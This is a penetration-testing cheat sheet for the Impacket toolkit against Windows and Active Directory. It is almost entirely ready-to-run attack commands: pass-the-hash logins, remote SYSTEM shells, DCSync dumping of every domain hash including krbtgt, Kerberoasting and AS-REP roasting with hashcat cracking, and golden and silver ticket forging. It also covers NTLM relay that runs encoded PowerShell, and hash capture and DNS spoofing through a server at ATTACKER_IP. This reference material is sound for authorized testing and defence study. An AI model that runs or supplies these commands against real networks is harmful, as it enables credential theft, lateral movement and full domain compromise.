Impacket Tools Guide

Impacket is a collection of Python classes for working with network protocols, focused on Windows and Active Directory. Every tool in the suite is indispensable for Windows pentesting.

Installation

pip install impacket
# or
git clone https://github.com/fortra/impacket && cd impacket && pip install .

# Verify
impacket-psexec --help

Authentication Formats

All Impacket tools accept multiple auth formats:

# Password
domain/user:password@target
user:password@target

# NTLM hash (Pass-the-Hash)
domain/user@target -hashes LM:NT
domain/user@target -hashes :NT_HASH   # only NT hash needed

# Kerberos ticket
domain/user@target -k -no-pass
# (KRB5CCNAME must be set to the ticket file)

# AES key (Kerberos)
domain/user@target -aesKey AES128_OR_AES256_KEY -k

Remote Execution Tools

psexec

Creates a service on the target for execution. Leaves artifacts but provides SYSTEM:

impacket-psexec domain/Administrator:password@192.168.1.100
impacket-psexec domain/Administrator@192.168.1.100 -hashes :NT_HASH
impacket-psexec domain/Administrator@192.168.1.100 -k -no-pass

# Execute single command
impacket-psexec domain/user:pass@target "cmd.exe /c whoami"

wmiexec

Uses WMI — less noisy, no service created, runs as the authenticated user:

impacket-wmiexec domain/user:password@192.168.1.100
impacket-wmiexec domain/user@192.168.1.100 -hashes :NT_HASH

# Execute command
impacket-wmiexec domain/user:pass@target "whoami"

# Semi-interactive shell (default)
# Fileless — output written to a temp file and read back

smbexec

Creates a service for each command. Noisier than wmiexec:

impacket-smbexec domain/user:password@target
impacket-smbexec domain/user@target -hashes :NT_HASH

atexec

Executes via the Task Scheduler:

impacket-atexec domain/user:password@target whoami

dcomexec

Uses DCOM (Distributed COM) for execution:

impacket-dcomexec domain/user:password@target

Credential Dumping

secretsdump

Dumps SAM, LSA secrets, NTDS.dit hashes, domain cached credentials:

# From remote (requires admin)
impacket-secretsdump domain/Administrator:password@DC_IP

# With hash
impacket-secretsdump domain/Administrator@DC_IP -hashes :NT_HASH

# DCSync (pulls all domain hashes)
impacket-secretsdump domain.local/Administrator:password@DC_IP -just-dc

# Local SAM/SYSTEM dump
impacket-secretsdump local -sam SAM -system SYSTEM -security SECURITY

# Get just NTDS hashes
impacket-secretsdump domain/Administrator:pass@DC -just-dc-ntlm

# Get specific user's hash via DCSync
impacket-secretsdump domain/Administrator:pass@DC -just-dc-user krbtgt

Kerberos Attacks

GetUserSPNs — Kerberoasting

# List SPNs
impacket-GetUserSPNs domain.local/user:password -dc-ip DC_IP

# Request hashes
impacket-GetUserSPNs domain.local/user:password -dc-ip DC_IP -request

# Save to file
impacket-GetUserSPNs domain.local/user:password -dc-ip DC_IP -request -outputfile kerberoast.txt

# Crack
hashcat -a 0 -m 13100 kerberoast.txt rockyou.txt

GetNPUsers — AS-REP Roasting

# Test list of users (no password needed)
impacket-GetNPUsers domain.local/ -dc-ip DC_IP -no-pass -usersfile users.txt

# With valid user (find other roastable users)
impacket-GetNPUsers domain.local/user:password -dc-ip DC_IP -request

# Save output
impacket-GetNPUsers domain.local/ -dc-ip DC_IP -no-pass -usersfile users.txt -format hashcat -outputfile asreproast.txt

# Crack
hashcat -a 0 -m 18200 asreproast.txt rockyou.txt

Ticket Operations

ticketer — Golden/Silver Ticket

# Golden Ticket (needs krbtgt hash + domain SID)
impacket-ticketer -nthash KRBTGT_HASH \
  -domain-sid S-1-5-21-XXXX \
  -domain domain.local \
  Administrator

# Use the ticket
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass domain.local/Administrator@DC_FQDN

# Silver Ticket (service ticket)
impacket-ticketer -nthash SERVICE_HASH \
  -domain-sid S-1-5-21-XXXX \
  -domain domain.local \
  -spn CIFS/server.domain.local \
  Administrator

getPac — Get PAC (Privilege Attribute Certificate)

impacket-getPac domain.local/user:password -targetUser Administrator

Network Services

smbserver — Serve Files / Capture Hashes

# Share a folder (no auth)
impacket-smbserver share /path/to/files -smb2support

# With auth (capture Net-NTLMv2 hashes)
impacket-smbserver share /tmp -username attacker -password password -smb2support

# Use from Windows to trigger authentication
\\ATTACKER_IP\share

# Capture and crack
hashcat -a 0 -m 5600 netntlmv2_hashes.txt rockyou.txt

ntlmrelayx — NTLM Relay Attacks

# Relay to all discovered SMB targets
impacket-ntlmrelayx -tf targets.txt -smb2support

# Interactive SMB shell
impacket-ntlmrelayx -t smb://TARGET_IP -smb2support -i

# Execute command
impacket-ntlmrelayx -t smb://TARGET_IP -smb2support -c "powershell -enc BASE64_CMD"

# LDAP relay (to create new admin user or dump NTDS)
impacket-ntlmrelayx -t ldap://DC_IP --delegate-access

# HTTP → SMB
impacket-ntlmrelayx -t smb://TARGET -smb2support
# Then trigger auth: responder or other LLMNR/NBT-NS poisoning

dnschef — DNS Proxy

# Respond to DNS queries with attacker IP
impacket-dnschef --fakeip ATTACKER_IP --fakedomains target.com

LDAP Tools

GetADUsers

impacket-GetADUsers domain.local/user:password -dc-ip DC_IP -all
impacket-GetADUsers domain.local/user:password -dc-ip DC_IP | grep -i admin

ldapdomaindump

pip install ldapdomaindump
ldapdomaindump -u "domain\user" -p password DC_IP -o /tmp/ldap_dump/

SMB Enumeration

samrdump

impacket-samrdump domain/user:password@target

lookupsid — Enumerate SIDs

impacket-lookupsid domain/user:password@DC_IP
impacket-lookupsid domain/user:password@DC_IP 20  # enumerate 20 SIDs

Quick Reference Table

Tool	Purpose	Auth needed
psexec	Remote shell (SYSTEM)	Admin
wmiexec	Remote shell (user context)	Admin
secretsdump	Dump hashes	Admin
GetUserSPNs	Kerberoasting	Any domain user
GetNPUsers	AS-REP roasting	None (or any user)
ticketer	Forge Kerberos tickets	krbtgt hash (golden)
ntlmrelayx	NTLM relay attacks	None (captures)
smbserver	Host files / capture hashes	None